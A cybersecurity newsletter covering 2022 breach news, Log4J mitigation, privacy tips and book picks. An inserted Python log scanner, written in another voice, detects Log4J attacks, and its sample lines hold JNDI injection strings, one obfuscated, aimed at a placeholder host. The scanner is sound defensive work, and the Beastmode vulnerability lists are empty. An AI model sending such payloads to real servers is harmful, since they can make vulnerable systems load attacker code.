Cybersecurity And Much More Newsletter — Week 13 (2022)

Seif Hateb
17 min read · Apr 3, 2022

Greetings, friends.

Welcome to my weekly newsletter; if you are not yet subscribed, please do. It might include books, articles, tech, tips, and of course interesting stuff about cybersecurity.

Enjoy!

What’s Happening

🚨 Criminals use fake EDRs to steal sensitive customer data from providers

Both Apple and Meta were tricked by fake EDRs (Emergency Data Requests) into providing sensitive user information.

EDRs are used by law enforcement to request users’ sensitive information without a warrant or subpoena in case of life-or-death situations.

The issue is the lack of proper mechanisms to test the validity of an EDR, search warrant, or subpoena.

Link

🍎 New Apple macOS and iOS Zero Days, the 5th time this year

These new Zero-Day vulnerabilities allow attackers to access or disrupt kernel activity. The vulnerabilities appear to be due to an “out-of-bounds read” in the Intel Graphics Driver of macOS that allows an application to read kernel memory, and to other flaws in AppleAVD, the Accelerate Framework, and AVEVideoEncoder that can allow applications to execute arbitrary code with kernel privileges.

Link

📰 Lapsus$ gang claims new hack with data from Apple, Abbott, Facebook, and more

They are back, and this time they claim to have stolen 70GB of data from Apple, Facebook, Abbott, Globant, DHL, and more. Most of these companies have not confirmed any breach yet, except Globant, which said that the data accessed by the criminals was very limited and that it found no evidence of broader impact.

Link

👾 Log4J is still around and causing more problems, now it’s VMWare

It has been four months since Log4J started terrifying cyberspace, and things don’t seem to be getting any better. The Chinese threat group known as Deep Panda exploited Log4J vulnerabilities in VMware Horizon servers to deploy backdoors and rootkits and exfiltrate data.

Link

👾 New Exploit added to Beastmode Botnet

The operators behind the Mirai-based DDoS botnet “Beastmode” added new exploits for Totolink routers to their toolkit, targeting the following Totolink vulnerabilities:

The Beastmode botnet also includes exploits for the following issues:

📱 Why Apple’s hardware subscription service could be a ‘huge deal for the company’

You might not need to get a second mortgage on your house 🏠 to get the latest MacBook pro! Woohoo! 🎉

Apple reportedly plans to launch a subscription model for devices, a move that could expand its market to a whole new class of consumers who can’t afford to pay $1,500 for an iPhone, or four times that for a laptop with keys that get stuck, almost no ports, and trouble detecting external displays.

This sounds like good news for consumers, but in reality it will be more beneficial to the manufacturer, which gets a steadier quarterly revenue.

Link

Some Security Tips

☁️ Sometimes it’s a good idea to encrypt your files before uploading them to the cloud

It might sound complicated for the average user, but it’s not. In just three steps, you can encrypt your data and upload it to your cloud storage space, all without any technical knowledge.

What can go wrong? The worst scenarios are losing access to your information because you lost the decryption key, or misplacing the key so that someone else gets access to your data.

To make it simpler, you can use software like Cryptomator and follow a few steps to encrypt your data:

  • Download the encryption software.
  • Create a vault (secure folder).
  • Create a directory for each of your cloud storage accounts.
  • Secure your directories with a strong password.
  • Put your files in the secure folder you just protected with a password.

Is it secure? Well, it encrypts your data using industry-standard encryption (AES-256), its code is open source, and it is publicly tested by security professionals.

Does it respect my privacy? It is GDPR compliant.

🚇 Can Free VPNs Be Trusted, and What Should I Do?

Free isn’t usually free 🫠. In most cases, it means that you are the product: the vendor is using your data, or, worse than that, the software itself is malicious.

To be fair, it’s often the case with paid VPNs too, where vendors give government agencies access to your data for national security reasons, and sometimes sell your personal data for profit or use it to enhance their service.

I know, that might be confusing, isn’t it? 😕

Do your research before using any app, not just VPNs, but apply more due diligence when it’s about security software. There are a lot of legitimate and trusted paid VPN providers, but also providers offering free VPN applications as part of their security or privacy suite.

ProtonVPN is one of the trusted providers, with a suite of secure email and privacy tools. 😎 It does not keep any logs, runs across all platforms, has a kill switch, and is FREE.

🛠 Tools that can be handy when dealing with Log4J 🐚

Since Log4J risks are still out there, here, as a reminder, are some of the actions you can take to reduce your exposure to the risks related to Log4J:

  1. Patching: it doesn’t seem to be the ultimate solution for Log4J these days, but it’s the least you can do. So, get the latest patches as a first step.
  2. Hardening: disable the Log4J library and JNDI lookups (or the remote codebase).
  3. Preventing: deploy properly configured web application firewalls. You can also apply the Log4J vaccine created by Cybereason.
  4. Detection: you can use this script to detect Log4J exploitation attempts.
  5. Hunting: look for IOCs (Indicators of Compromise), including the Log4J hashes, within your environment.

You can check CISA’s Log4J mitigation guidance for more details and resources.
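To make the detection step concrete, here is a small added example (my own code, not the script the newsletter links to and not from any project): a Python scanner that collapses nested Log4j lookups in web-server log lines and flags any line whose normalised form still carries a `${jndi:...}` lookup. The log lines and the `lookup.invalid` host are constructed for the demo.

```python
import re

# Constructed sample web-server log lines for the demo; not from the newsletter
# or any real incident. The host "lookup.invalid" is a placeholder.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:12:03 +0000] "GET /login HTTP/1.1" 200 812 "-" "${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:05 +0000] "GET /?q=${${lower:j}ndi:rmi://lookup.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.68"',
    '10.0.0.11 - - [10/Dec/2021:10:12:07 +0000] "GET /api?user=${env:USER:-guest} HTTP/1.1" 200 99 "-" "python-requests/2.25"',
]

# Matches the innermost ${...} lookup, i.e. one with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match: re.Match) -> str:
    """Evaluate one innermost Log4j lookup the way the library would, where modelled.

    Only the lookups needed to normalise a request are handled: ${lower:x},
    ${upper:x}, and the ${name:-default} syntax (which yields the default text).
    Any other lookup, including jndi, is left untouched so it stays visible.
    """
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, _, value = body.partition(":")
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan(lines):
    """Return (1-based line number, normalised lookup) for each line carrying a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        for lookup in INNER_LOOKUP.findall(normalized):
            if lookup.lower().startswith("jndi:"):
                findings.append((number, "${" + lookup + "}"))
    return findings


if __name__ == "__main__":
    for number, lookup in scan(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup attempt -> {lookup}")
```

Line 4 shows why normalising first matters: the default-value syntax collapses to plain text and is not reported, while line 3 only reveals its JNDI lookup after the nested lookup is resolved.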

Some Security Concepts

📝 Note — 🔐 Security — Data Protection 💽 — What should be the first step in a DLP program?

Big companies usually rush to buy the latest and greatest tools and hire one of the Big Four to help get their data protection programs up and running. However, most of them fail because they ignore the root cause of their DLP gaps and the foundations of managing information in general.

You can’t protect what you don’t know: your first step is to discover all your data and identify what is sensitive and what’s not.

Just by following the best practices of secure system configuration and identity management, you can drastically reduce the exposure of your sensitive information.

Stay tuned for more Data Protection content!

📝 Note — 📡 Telco/IoT Security — 5G Security Enhancements

5G’s benefits aren’t limited to high speed, low latency, and massive connectivity. It’s about the use cases that 5G makes a better reality, like telemedicine, virtual reality, 3D, and smart cities. But most importantly, it brings enhanced security and privacy compared to the previous generations of cellular networks.

  • More privacy for users by concealing the subscriber’s identity.
  • Enhanced Authentication Framework that’s access agnostic, more flexible, and offers better key hierarchy.
  • Advanced Interconnect Security and Integrity Protection to help with Control and User Plane security, especially in Roaming scenarios.
  • Service-Based Interface Security and Zero Trust.
  • Secure Session Establishment to protect against over-the-air attacks.

Stay tuned for more Telco and IoT Security content!

My Favorites

⚛️ Swiss quantum computing company claiming a world-first discovery🇨🇭

The Swiss quantum computing company “Terra Quantum” announced on 3/31/22 a world-first discovery that is believed to be one of the largest funding rounds in the history of the quantum tech space.

Their discovery will be a game-changer that will break the fundamental limits of power dissipation and will make transistors more capable of handling the generated heat.

If you want to read the research article, check out the link below.

Disclaimer: like all research articles, the effort to make it unreadable and make the research look more complicated than it is seemed almost equivalent to the scientific work itself. JK 😂

Link

✍️ Can weekly prednisone treat obesity?

Obese mice that were fed a high-fat diet and that received prednisone one time per week had improved exercise endurance, got stronger, increased their lean body mass, and lost weight, reports a new study. The mice also had increased muscle metabolism. The once-weekly prednisone promoted nutrient uptake into the muscles.

Link

🦷 Writing Google reviews about patients is a HIPAA violation!

In the past few years, the phrase “HIPAA violation” has been thrown around a lot, often incorrectly. People have cited the law, which protects patient health information, as a reason they can’t be asked if they’re vaccinated or can’t get a doctor’s note for an employer. But what happens when a doctor replies to a Google review? Believe it or not, it’s a HIPAA violation!

Link

📚 🤔 Books I’m Currently Reading

Title: Not Dead Yet: The Memoir

Author: Phil Collins

Overview:

In his much-awaited memoir, Not Dead Yet, he tells the story of his epic career, with an encouraging debut at age 11 in a crowd shot from the Beatles’ legendary film A Hard Day’s Night. A drummer since almost before he could walk, Collins received on-the-job training in the seedy, thrilling bars and clubs of the 1960s swinging London before finally landing the drum seat in Genesis.

Soon, he would step into the spotlight on vocals after the departure of Peter Gabriel and begin to stockpile the songs that would rocket him to international fame with the release of Face Value and “In the Air Tonight.” Whether he’s recalling jamming with Eric Clapton and Robert Plant, pulling together a big band fronted by Tony Bennett, or writing the music for Disney’s smash-hit animated Tarzan, Collins’s storytelling chops never waver. And of course, he answers the pressing question on everyone’s mind: just what does “Sussudio” mean?

Not Dead Yet is Phil Collins’s candid, witty, unvarnished story of the songs and shows, the hits and pans, his marriages and divorces, the ascents to the top of the charts and into the tabloid headlines. As one of only three musicians to sell 100 million records both in a group and as a solo artist, Collins breathes rare air but has never lost his touch at crafting songs from the heart that touch listeners around the globe. That same touch is on magnificent display here, especially as he unfolds his harrowing descent into darkness after his “official” retirement in 2007, and the profound, enduring love that helped save him.

This is Phil Collins as you’ve always known him, but also as you’ve never heard him before.

Link

📚 🤩 Books I Recommend Reading

Title: Clockwork: Design Your Business to Run Itself

Author: Mike Michalowicz

Overview:

If you’re like most entrepreneurs, you started your business so you could be your own boss, make the money you deserve, and live life on your terms. In reality, you’re bogged down in the daily grind, constantly putting out fires, answering an endless stream of questions, and continually hunting for cash.

Now, Mike Michalowicz, the author of Profit First and other small-business bestsellers, offers a straightforward step-by-step path out of this dilemma. In Clockwork, he draws on more than six years of research and real-life examples to explain his simple approach to making your business ultra-efficient.

Among other powerful strategies, you will discover how to:

  • Make your employees act like owners: Free yourself from micromanaging by using a simple technique to empower your people to make smart decisions without you.
  • Pinpoint your business’s most important function: Unleash incredible efficiency by identifying and focusing everyone on the one function that is most crucial to your business.
  • Know what to fix next: Most entrepreneurs try to fix every inefficiency at once and end up fixing nothing. Use the “weakest link in the chain” method to find the one fix that will add the most value now.

Whether you have a staff of one, one hundred, or somewhere in between, whether you’re a new entrepreneur or have been overworked and overstressed for years, Clockwork is your path to finally making your business work for you.

Link

🎙 Podcast — Darknet Diaries Episode 111 is about the most famous banking trojan, ZeuS — designed to steal money from online bank users’ accounts. This trojan became so big that it resulted in one of the biggest FBI operations ever.

Link

🎥 Videos — Every Engine Layout Explained. Did you ever wonder what the difference is between an I-6 and a V-6 engine? Well, personally, nothing would change my mind about BMW’s naturally aspirated I-6 engines 😄, they are bulletproof and really fun to drive. However, there are some unique ones out there too, like Audi’s V5 engines, or Subaru’s Boxer engines.

Link

Quote of the Week

“Great spirits have always encountered violent opposition from mediocre minds.” Albert Einstein

If you’re interested in starting a career in Cybersecurity, watch this one, and don’t forget to subscribe to my channel and leave a comment if there are any topics you’re interested in seeing on my next videos.

Check my other stuff here.

Seif Hateb

Cybersecurity Professional, Lecturer, Cryptographer, Martial Artist.